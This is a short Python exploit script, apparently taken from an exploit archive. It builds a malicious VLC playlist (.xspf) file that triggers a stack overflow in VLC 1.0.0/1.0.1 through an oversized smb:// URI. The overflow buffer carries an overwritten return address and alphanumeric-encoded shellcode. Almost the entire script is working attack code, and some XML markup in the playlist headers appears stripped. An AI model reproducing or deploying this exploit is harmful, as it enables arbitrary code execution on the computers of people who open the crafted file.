#!/usr/bin/env python # VLC Media Player 1.0.0\1.0.1 smb:// URI Handling Remote Stack Overflow # Xpl By : Mountassif Moad # Thanks : His0ka - Simo-soft - v4 Team # Original : http://www.milw0rm.com/exploits/9427 # popup_msg=( "TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0" "BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO" "jpJHIvKOYokObPPwRN1uqt5PA") # from his0k4 exploit :d cose i lost the alpha encoder tool :s header1 = ("\n") header1 += ("\n") header1 += ("\tPlaylist\n") header1 += ("\t\n") header1 += ("\t\t\n") header1 += ("\t\t\tsmb://example.com@www.example.com/foo/#{") payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 90 + "\x33\x52\x48\x7E" + popup_msg + "\x45" * 43 ) header2 = ("}\n"); header2 += ("\t\t\t\n"); header2 += ("\t\t\t\t0\n"); header2 += ("\t\t\t\n"); header2 += ("\t\t\n"); header2 += ("\t\n"); header2 += ("\n"); try: f1 = open("vlc_1.0.X.xspf","w") f1.write(header1 + payload + header2) f1.close() print("\nExploit file created!\n") except: print "Error"